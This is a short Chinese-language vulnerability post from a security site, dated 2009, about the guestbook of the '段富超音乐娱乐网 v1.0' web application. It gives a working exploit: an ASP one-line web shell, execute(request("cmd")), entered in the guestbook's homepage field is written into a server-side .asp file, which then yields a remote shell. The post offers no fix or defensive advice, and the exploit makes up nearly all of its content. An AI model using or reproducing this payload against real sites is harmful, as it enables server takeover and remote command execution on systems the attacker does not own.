频道栏目
首页 > 安全 > 网站安全 > 正文

段富超音乐娱乐网 v1.0 漏洞

2009-08-10 23:42:52           
收藏   我要投稿

author:cnryan

程序下载:http://www.codepub.com/software/view-software-16001.html

简要描述:留言处没严格过滤可直接向数据库插马

漏洞页面:dfc1.0/addgbook.asp

漏洞利用: 在留言“你的主页”写入一句话代码,<%execute(request("cmd"))%>,留言信息会写进date/dfc.asp

连接即可获得shell
http://127.0.0.1/dfc1.0/date/dfc.asp

上一篇:ewebeditor 5.2 列目录漏洞
下一篇:影库联盟程序的Bug
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站